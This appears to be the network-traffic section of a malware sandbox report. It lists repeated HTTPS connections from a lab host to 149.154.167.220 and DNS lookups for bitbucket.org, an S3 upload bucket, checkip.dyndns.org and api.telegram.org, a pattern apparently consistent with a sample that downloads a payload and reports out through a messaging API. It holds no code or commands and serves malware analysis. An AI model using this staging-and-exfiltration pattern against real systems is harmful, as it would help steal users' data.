                                                                                                        Dec 18, 2024 16:32:21.173686981 CET44349906149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.175731897 CET49906443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.175746918 CET44349906149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.175867081 CET49906443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.175873041 CET44349906149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.586009026 CET44349908149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.587871075 CET49908443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.587889910 CET44349908149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.587980032 CET49908443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.587985992 CET44349908149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.724169016 CET44349906149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.724385023 CET44349906149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.724456072 CET49906443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.724786043 CET49906443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.726147890 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.726197958 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.726284027 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.726583958 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.726605892 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.213272095 CET44349908149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.213370085 CET44349908149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.213674068 CET49908443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.214044094 CET49908443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.215446949 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.215504885 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.215589046 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.215837002 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.215852022 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.419882059 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.424751997 CET49913443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.424768925 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.427059889 CET49913443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.427067041 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.000848055 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.000930071 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.000993013 CET49913443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.001616955 CET49913443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.003386974 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.003436089 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.003501892 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.003844976 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.003855944 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.121129990 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.123270988 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.123320103 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.123625994 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.123635054 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.616189003 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.617899895 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.617930889 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.618021965 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.618027925 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.920447111 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.920552015 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.920636892 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.921175957 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.960850954 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.960899115 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.960975885 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.961293936 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.961306095 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.408140898 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.409883022 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.409904003 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.409981012 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.409986019 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.526465893 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.526591063 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.526638985 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.527271986 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.528753042 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.528775930 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.528842926 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.529164076 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.529174089 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.067285061 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.067506075 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.067579985 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.068094969 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.069344044 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.069374084 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.069477081 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.069762945 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.069773912 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.333070040 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.334904909 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.334928036 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.335028887 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.335035086 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.894042969 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.894135952 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.894378901 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.894707918 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.896127939 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.896167994 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.896382093 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.896637917 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.896658897 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.981841087 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.983694077 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.983714104 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.987601995 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.987610102 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.434979916 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.436826944 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.436852932 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.437063932 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.437069893 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.538923979 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.540137053 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.540198088 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.540587902 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.545176029 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.545206070 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.545609951 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.587347984 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.587364912 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.985013008 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.985100031 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.985249043 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.985734940 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.987075090 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.987113953 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.987175941 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.987447023 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.987461090 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.261293888 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.263442993 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.263472080 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.263530016 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.263537884 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.815290928 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.815469027 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.815783024 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.817275047 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.817277908 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.817315102 CET44349938149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.819915056 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.819915056 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.819950104 CET44349938149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.997864008 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.002296925 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.002324104 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.002422094 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.002425909 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.355017900 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.358289003 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.358309031 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.358380079 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.358390093 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.582938910 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.584399939 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.584475994 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.585230112 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.586936951 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.586993933 CET44349939149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.587126017 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.587528944 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.587564945 CET44349939149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.906186104 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.906281948 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.906331062 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.907102108 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.945394993 CET49940443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.945522070 CET44349940149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.945591927 CET49940443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.945960045 CET49940443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.945992947 CET44349940149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:29.180994987 CET44349938149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:29.233220100 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:29.710582018 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:29.710609913 CET44349938149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:29.710696936 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:29.710706949 CET44349938149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:29.968112946 CET44349939149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:29.970333099 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:29.970421076 CET44349939149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:29.970494986 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:29.970511913 CET44349939149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.315538883 CET44349940149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.317157030 CET44349938149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.317323923 CET49940443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.317348957 CET44349940149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.317627907 CET49940443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.317632914 CET44349940149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.317909956 CET44349938149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.317975998 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.318209887 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.319480896 CET49946443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.319511890 CET44349946149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.319595098 CET49946443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.319785118 CET49946443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.319799900 CET44349946149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.546269894 CET44349939149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.546371937 CET44349939149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.546509981 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.546983004 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.548182964 CET49947443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.548223972 CET44349947149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.548301935 CET49947443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.548566103 CET49947443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.548580885 CET44349947149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.916723013 CET44349940149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.916841030 CET44349940149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.916898966 CET49940443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.917366028 CET49940443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.918833971 CET49948443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.918867111 CET44349948149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:30.918972015 CET49948443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.919281006 CET49948443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:30.919292927 CET44349948149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:31.709706068 CET44349946149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:31.711921930 CET49946443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:31.711946964 CET44349946149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:31.712080002 CET49946443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:31.712090969 CET44349946149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:31.914588928 CET44349947149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:31.916099072 CET49947443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:31.916115999 CET44349947149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:31.916306973 CET49947443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:31.916315079 CET44349947149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:32.283622980 CET44349948149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:32.327002048 CET49948443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:32.391978025 CET44349946149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:32.392071962 CET44349946149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:32.395603895 CET49946443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:32.530534029 CET44349947149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:32.530656099 CET44349947149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:32.530761003 CET49947443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.291790009 CET49948443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.291810036 CET44349948149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:36.291855097 CET49948443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.291862011 CET44349948149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:36.300035000 CET49946443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.300744057 CET49960443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.300782919 CET44349960149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:36.300856113 CET49960443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.301134109 CET49960443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.301147938 CET44349960149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:36.335144043 CET49947443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.336357117 CET49961443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.336388111 CET44349961149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:36.336462975 CET49961443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.336654902 CET49961443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.336675882 CET44349961149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:36.869739056 CET44349948149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:36.869832039 CET44349948149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:36.870059013 CET49948443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.870755911 CET49948443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.871247053 CET49966443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.871279955 CET44349966149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:36.871376991 CET49966443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.871567011 CET49966443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:36.871577024 CET44349966149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:37.666287899 CET44349960149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:37.700906038 CET44349961149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:37.711357117 CET49960443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:37.748863935 CET49961443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:38.264492035 CET44349966149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:38.311319113 CET49966443192.168.2.8149.154.167.220

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 18, 2024 16:30:30.686155081 CET5455553192.168.2.81.1.1.1
                                                                                                        Dec 18, 2024 16:30:30.823501110 CET53545551.1.1.1192.168.2.8
                                                                                                        Dec 18, 2024 16:30:33.178805113 CET4954953192.168.2.81.1.1.1
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET53495491.1.1.1192.168.2.8
                                                                                                        Dec 18, 2024 16:30:40.436945915 CET6210353192.168.2.81.1.1.1
                                                                                                        Dec 18, 2024 16:30:40.670293093 CET53621031.1.1.1192.168.2.8
                                                                                                        Dec 18, 2024 16:30:48.074112892 CET6123253192.168.2.81.1.1.1
                                                                                                        Dec 18, 2024 16:30:48.211654902 CET53612321.1.1.1192.168.2.8
                                                                                                        Dec 18, 2024 16:31:01.981468916 CET5876453192.168.2.81.1.1.1
                                                                                                        Dec 18, 2024 16:31:02.126786947 CET53587641.1.1.1192.168.2.8

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 18, 2024 16:30:30.686155081 CET192.168.2.81.1.1.10xaeecStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.178805113 CET192.168.2.81.1.1.10x7945Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:40.436945915 CET192.168.2.81.1.1.10x6b37Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:48.074112892 CET192.168.2.81.1.1.10x8181Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:31:01.981468916 CET192.168.2.81.1.1.10xccfStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 18, 2024 16:30:30.823501110 CET1.1.1.1192.168.2.80xaeecNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:30.823501110 CET1.1.1.1192.168.2.80xaeecNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:30.823501110 CET1.1.1.1192.168.2.80xaeecNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)s3-w.us-east-1.amazonaws.com54.231.224.185A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)s3-w.us-east-1.amazonaws.com52.216.59.161A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)s3-w.us-east-1.amazonaws.com16.15.176.52A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)s3-w.us-east-1.amazonaws.com54.231.198.81A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)s3-w.us-east-1.amazonaws.com3.5.27.220A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)s3-w.us-east-1.amazonaws.com54.231.235.89A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)s3-w.us-east-1.amazonaws.com3.5.24.78A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:33.493093967 CET1.1.1.1192.168.2.80x7945No error (0)s3-w.us-east-1.amazonaws.com54.231.130.233A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:40.670293093 CET1.1.1.1192.168.2.80x6b37No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:40.670293093 CET1.1.1.1192.168.2.80x6b37No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:40.670293093 CET1.1.1.1192.168.2.80x6b37No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:40.670293093 CET1.1.1.1192.168.2.80x6b37No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:40.670293093 CET1.1.1.1192.168.2.80x6b37No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:30:40.670293093 CET1.1.1.1192.168.2.80x6b37No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
